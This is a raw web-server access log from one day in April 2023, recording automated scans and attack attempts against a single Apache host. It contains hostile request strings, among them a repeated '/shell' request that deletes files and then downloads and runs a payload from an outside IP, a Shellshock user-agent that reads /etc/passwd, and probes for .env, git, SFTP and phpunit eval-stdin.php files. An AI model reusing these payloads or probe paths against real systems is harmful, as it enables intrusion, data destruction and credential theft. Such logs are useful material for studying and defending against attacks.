135.125.246.110 - - [05/Apr/2023:05:21:41 +0000] "POST / HTTP/1.1" 405 409714 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:05:38:10 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:05:38:11 +0000] "POST / HTTP/1.1" 405 409720 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.225.74.198 - - [05/Apr/2023:05:52:56 +0000] "GET / HTTP/1.1" 200 8385 "-" "python-requests/2.28.1"
185.225.74.198 - - [05/Apr/2023:05:52:57 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.225.74.198 - - [05/Apr/2023:05:52:57 +0000] "POST / HTTP/1.1" 405 409801 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.225.74.198 - - [05/Apr/2023:05:53:01 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 405 413619 "-" "python-requests/2.28.1"
83.169.252.97 - - [05/Apr/2023:05:55:47 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
15.206.128.154 - - [05/Apr/2023:05:57:09 +0000] "POST / HTTP/1.1" 405 409655 "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
15.206.128.154 - - [05/Apr/2023:05:57:11 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
193.32.162.159 - - [05/Apr/2023:06:01:25 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
165.22.29.115 - - [05/Apr/2023:06:11:02 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.1.0) Gecko/20100101 Firefox/60.1.0"
135.125.246.110 - - [05/Apr/2023:06:15:36 +0000] "POST / HTTP/1.1" 405 409724 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [05/Apr/2023:06:21:41 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
180.149.125.167 - - [05/Apr/2023:06:32:06 +0000] "GET /stalker_portal/server/tools/auth_simple.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
2.187.21.240 - - [05/Apr/2023:06:35:05 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
104.28.211.186 - - [05/Apr/2023:07:10:27 +0000] "GET /cdn-cgi/trace HTTP/1.1" 200 - "-" "Mozilla/5.0"
202.52.58.28 - - [05/Apr/2023:07:20:01 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
177.137.207.114 - - [05/Apr/2023:07:35:04 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+167.71.210.63/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
43.154.128.189 - - [05/Apr/2023:07:42:42 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.246.110 - - [05/Apr/2023:07:56:55 +0000] "POST / HTTP/1.1" 405 409704 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
107.170.234.10 - - [05/Apr/2023:08:12:27 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozilla/5.0 zgrab/0.x"
193.32.162.159 - - [05/Apr/2023:08:14:16 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.254.196.173 - - [05/Apr/2023:08:36:49 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:08:36:50 +0000] "POST / HTTP/1.1" 405 409726 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
124.161.226.245 - - [05/Apr/2023:08:40:35 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+167.71.210.63/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
172.104.11.34 - - [05/Apr/2023:08:51:12 +0000] "\x16\x03\x01" 400 226 "-" "-"
43.154.128.189 - - [05/Apr/2023:09:05:02 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
161.97.174.25 - - [05/Apr/2023:09:26:24 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
161.97.174.25 - - [05/Apr/2023:09:26:25 +0000] "POST / HTTP/1.1" 405 422687 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0"
161.97.174.25 - - [05/Apr/2023:09:26:26 +0000] "GET /adminer.php HTTP/1.1" 200 1953 "-" "python-requests/2.22.0"
161.97.174.25 - - [05/Apr/2023:09:26:26 +0000] "GET /Adminer.php HTTP/1.1" 200 - "-" "python-requests/2.22.0"
161.97.174.25 - - [05/Apr/2023:09:26:26 +0000] "GET /phpmyadmin HTTP/1.1" 200 - "-" "python-requests/2.22.0"
135.125.246.110 - - [05/Apr/2023:10:01:03 +0000] "POST / HTTP/1.1" 405 409728 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:10:04:42 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:10:04:46 +0000] "POST / HTTP/1.1" 405 409712 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
193.32.162.159 - - [05/Apr/2023:10:05:33 +0000] "GET / HTTP/1.1" 200 8382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.87.204.23 - - [05/Apr/2023:10:05:43 +0000] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 219 "-" "\"() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'\""
5.252.167.165 - - [05/Apr/2023:10:27:18 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
5.252.167.165 - - [05/Apr/2023:10:27:18 +0000] "POST / HTTP/1.1" 405 409772 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
5.252.167.165 - - [05/Apr/2023:10:27:20 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 - "-" "python-requests/2.28.2"
43.154.128.189 - - [05/Apr/2023:10:29:18 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
135.125.246.110 - - [05/Apr/2023:10:52:28 +0000] "POST / HTTP/1.1" 405 409728 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
138.36.23.114 - - [05/Apr/2023:10:55:28 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+167.71.210.63/jaws;sh+/tmp/jaws HTTP/1.1" 200 - "-" "Hello, world"
45.79.181.251 - - [05/Apr/2023:10:56:08 +0000] "\x16\x03\x01" 400 226 "-" "-"
185.180.143.72 - - [05/Apr/2023:11:33:35 +0000] "GET / HTTP/1.1" 200 8381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
182.1.71.145 - - [05/Apr/2023:11:36:19 +0000] "GET /.git/config HTTP/1.1" 200 - "-" "python-requests/2.28.2"
182.1.71.145 - - [05/Apr/2023:11:36:20 +0000] "GET /enviroments/.env.production HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
182.1.71.145 - - [05/Apr/2023:11:36:21 +0000] "POST /enviroments/.env.production HTTP/1.1" 405 413311 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
182.1.71.145 - - [05/Apr/2023:11:36:26 +0000] "GET /myadmin/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
182.1.71.145 - - [05/Apr/2023:11:36:28 +0000] "GET /mysql-admin/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
182.1.71.145 - - [05/Apr/2023:11:36:36 +0000] "GET /phpMyAdmin-2/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
182.1.71.145 - - [05/Apr/2023:11:36:37 +0000] "GET /webdb/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
182.1.71.145 - - [05/Apr/2023:11:36:38 +0000] "GET /phpMyAdmin2/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
182.1.71.145 - - [05/Apr/2023:11:36:39 +0000] "GET /mysqladmin/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
182.1.71.145 - - [05/Apr/2023:11:36:40 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
182.1.71.145 - - [05/Apr/2023:11:36:41 +0000] "GET /sqlmanager/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
182.1.71.145 - - [05/Apr/2023:11:36:43 +0000] "GET /PMA/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
182.1.71.145 - - [05/Apr/2023:11:36:45 +0000] "GET /pma/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
182.1.71.145 - - [05/Apr/2023:11:36:46 +0000] "GET /phpmyadmin2/index.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
182.1.71.145 - - [05/Apr/2023:11:36:48 +0000] "GET /adminer.php?username=******** HTTP/1.1" 403 4584 "-" "python-requests/2.28.2"
182.1.71.145 - - [05/Apr/2023:11:36:49 +0000] "POST /adminer.php?username=******** HTTP/1.1" 302 - "http://13.244.159.169:80/adminer.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33"
182.1.71.145 - - [05/Apr/2023:11:36:50 +0000] "GET /adminer.php?username=%2A%2A%2A%2A%2A%2A%2A%2A HTTP/1.1" 403 4637 "http://13.244.159.169:80/adminer.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36 Edg/102.0.1245.33"
182.1.71.145 - - [05/Apr/2023:11:36:51 +0000] "GET /frontend_dev.php/$ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
182.1.71.145 - - [05/Apr/2023:11:36:52 +0000] "GET /debug/default/view?panel=config HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
182.1.71.145 - - [05/Apr/2023:11:36:53 +0000] "GET /.json HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
182.1.71.145 - - [05/Apr/2023:11:36:54 +0000] "GET /config.json HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
182.1.71.145 - - [05/Apr/2023:11:36:55 +0000] "GET /phpinfo.php HTTP/1.1" 200 23912 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
182.1.71.145 - - [05/Apr/2023:11:36:57 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 405 413742 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:11:37:41 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:11:37:43 +0000] "POST / HTTP/1.1" 405 409714 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.209.125.58 - - [05/Apr/2023:11:59:56 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
154.209.125.115 - - [05/Apr/2023:11:59:57 +0000] "GET /assets/front/base/images/favicon/16_16/favicon.png HTTP/1.1" 200 3098 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
154.209.125.115 - - [05/Apr/2023:11:59:57 +0000] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE"
182.1.71.145 - - [05/Apr/2023:12:09:12 +0000] "GET / HTTP/1.1" 200 8377 "-" "Mozila/5.0"
182.1.71.145 - - [05/Apr/2023:12:09:14 +0000] "GET / HTTP/1.1" 200 8383 "-" "Go-http-client/1.1"
182.1.71.145 - - [05/Apr/2023:12:09:16 +0000] "GET /sftp.json HTTP/1.1" 200 - "-" "Mozila/5.0"
182.1.71.145 - - [05/Apr/2023:12:09:16 +0000] "GET /prevlaravel/sftp-config.json HTTP/1.1" 200 - "-" "Mozila/5.0"
182.1.71.145 - - [05/Apr/2023:12:09:16 +0000] "GET /.vscode/sftp.json HTTP/1.1" 200 - "-" "Mozila/5.0"
182.1.71.145 - - [05/Apr/2023:12:09:16 +0000] "GET /sftp-config.json HTTP/1.1" 200 - "-" "Mozila/5.0"
182.1.71.145 - - [05/Apr/2023:12:09:20 +0000] "GET /sftp.json HTTP/1.1" 200 - "-" "Go-http-client/1.1"
182.1.71.145 - - [05/Apr/2023:12:09:20 +0000] "GET /prevlaravel/sftp-config.json HTTP/1.1" 200 - "-" "Go-http-client/1.1"
182.1.71.145 - - [05/Apr/2023:12:09:20 +0000] "GET /.vscode/sftp.json HTTP/1.1" 200 - "-" "Go-http-client/1.1"
182.1.71.145 - - [05/Apr/2023:12:09:20 +0000] "GET /sftp-config.json HTTP/1.1" 200 - "-" "Go-http-client/1.1"
35.89.6.174 - - [05/Apr/2023:12:13:07 +0000] "GET / HTTP/1.1" 200 8383 "-" "Mozila/5.0"
35.89.6.174 - - [05/Apr/2023:12:13:08 +0000] "GET / HTTP/1.1" 200 8381 "-" "Go-http-client/1.1"
35.89.6.174 - - [05/Apr/2023:12:13:09 +0000] "GET /sftp-config.json HTTP/1.1" 200 - "-" "Mozila/5.0"
35.89.6.174 - - [05/Apr/2023:12:13:09 +0000] "GET /.vscode/sftp.json HTTP/1.1" 200 - "-" "Mozila/5.0"
35.89.6.174 - - [05/Apr/2023:12:13:09 +0000] "GET /prevlaravel/sftp-config.json HTTP/1.1" 200 - "-" "Mozila/5.0"
35.89.6.174 - - [05/Apr/2023:12:13:09 +0000] "GET /sftp.json HTTP/1.1" 200 - "-" "Mozila/5.0"
35.89.6.174 - - [05/Apr/2023:12:13:09 +0000] "GET /sftp-config.json HTTP/1.1" 200 - "-" "Go-http-client/1.1"
35.89.6.174 - - [05/Apr/2023:12:13:09 +0000] "GET /.vscode/sftp.json HTTP/1.1" 200 - "-" "Go-http-client/1.1"
35.89.6.174 - - [05/Apr/2023:12:13:09 +0000] "GET /prevlaravel/sftp-config.json HTTP/1.1" 200 - "-" "Go-http-client/1.1"
35.89.6.174 - - [05/Apr/2023:12:13:09 +0000] "GET /sftp.json HTTP/1.1" 200 - "-" "Go-http-client/1.1"
35.89.6.174 - - [05/Apr/2023:12:20:40 +0000] "GET / HTTP/1.1" 200 8377 "-" "Mozila/5.0"
35.89.6.174 - - [05/Apr/2023:12:20:40 +0000] "GET / HTTP/1.1" 200 8381 "-" "Go-http-client/1.1"
35.89.6.174 - - [05/Apr/2023:12:20:41 +0000] "GET /sftp.json HTTP/1.1" 200 - "-" "Mozila/5.0"
35.89.6.174 - - [05/Apr/2023:12:20:41 +0000] "GET /prevlaravel/sftp-config.json HTTP/1.1" 200 - "-" "Mozila/5.0"
35.89.6.174 - - [05/Apr/2023:12:20:41 +0000] "GET /.vscode/sftp.json HTTP/1.1" 200 - "-" "Mozila/5.0"
35.89.6.174 - - [05/Apr/2023:12:20:41 +0000] "GET /sftp-config.json HTTP/1.1" 200 - "-" "Mozila/5.0"
35.89.6.174 - - [05/Apr/2023:12:20:42 +0000] "GET /prevlaravel/sftp-config.json HTTP/1.1" 200 - "-" "Go-http-client/1.1"
35.89.6.174 - - [05/Apr/2023:12:20:42 +0000] "GET /.vscode/sftp.json HTTP/1.1" 200 - "-" "Go-http-client/1.1"
35.89.6.174 - - [05/Apr/2023:12:20:42 +0000] "GET /sftp.json HTTP/1.1" 200 - "-" "Go-http-client/1.1"
35.89.6.174 - - [05/Apr/2023:12:20:42 +0000] "GET /sftp-config.json HTTP/1.1" 200 - "-" "Go-http-client/1.1"
193.32.162.159 - - [05/Apr/2023:12:33:32 +0000] "GET / HTTP/1.1" 200 8386 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
::1 - - [05/Apr/2023:12:38:41 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [05/Apr/2023:12:38:42 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
::1 - - [05/Apr/2023:12:38:43 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips (internal dummy connection)"
107.170.244.8 - - [05/Apr/2023:12:50:37 +0000] "MGLNDD_13.244.159.169_80\n" 400 226 "-" "-"
185.254.196.173 - - [05/Apr/2023:13:07:10 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
185.254.196.173 - - [05/Apr/2023:13:07:10 +0000] "POST / HTTP/1.1" 405 409706 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [05/Apr/2023:13:14:01 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
221.11.66.51 - - [05/Apr/2023:13:20:01 +0000] "GET / HTTP/1.1" 400 226 "-" "-"
5.252.167.165 - - [05/Apr/2023:13:29:55 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
5.252.167.165 - - [05/Apr/2023:13:29:55 +0000] "POST / HTTP/1.1" 405 409742 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
5.252.167.165 - - [05/Apr/2023:13:30:00 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 - "-" "python-requests/2.28.2"
135.125.246.110 - - [05/Apr/2023:13:36:08 +0000] "POST / HTTP/1.1" 405 409728 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
35.89.6.174 - - [05/Apr/2023:13:51:35 +0000] "POST / HTTP/1.1" 405 409678 "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
35.89.6.174 - - [05/Apr/2023:13:51:37 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh;                 Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML,                 like Gecko) Chrome/39.0.2171.95 Safari/537.36"
159.203.192.13 - - [05/Apr/2023:14:06:22 +0000] "GET /druid/index.html HTTP/1.1" 200 - "-" "Mozilla/5.0 zgrab/0.x"
185.112.36.122 - - [05/Apr/2023:14:10:25 +0000] "GET / HTTP/1.1" 200 41226 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
35.240.121.17 - - [05/Apr/2023:14:22:51 +0000] "GET / HTTP/1.1" 200 8382 "-" "python-requests/2.28.2"
193.32.162.159 - - [05/Apr/2023:14:35:52 +0000] "GET / HTTP/1.1" 200 8385 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.254.196.173 - - [05/Apr/2023:14:37:16 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.154.128.189 - - [05/Apr/2023:14:37:20 +0000] "HEAD /Core/Skin/Login.aspx HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36"
165.227.0.21 - - [05/Apr/2023:14:42:54 +0000] "GET / HTTP/1.0" 200 41226 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0"
179.43.142.213 - - [05/Apr/2023:14:47:11 +0000] "GET /.env HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
179.43.142.213 - - [05/Apr/2023:14:47:12 +0000] "POST / HTTP/1.1" 405 409719 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
149.28.24.76 - - [05/Apr/2023:14:47:14 +0000] "GET / HTTP/1.1" 200 41226 "-" "curl/7.76.1"
149.28.24.76 - - [05/Apr/2023:14:47:16 +0000] "GET /public/ HTTP/1.1" 301 236 "-" "curl/7.76.1"
37.139.128.91 - - [05/Apr/2023:15:04:57 +0000] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
37.139.128.91 - - [05/Apr/2023:15:04:57 +0000] "GET /info.php HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
37.139.128.91 - - [05/Apr/2023:15:04:58 +0000] "GET /phpinfo.php HTTP/1.1" 200 23991 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
37.139.128.91 - - [05/Apr/2023:15:04:59 +0000] "GET /_profiler/phpinfo HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
37.139.128.91 - - [05/Apr/2023:15:05:01 +0000] "GET /debug/default/view?panel=config HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
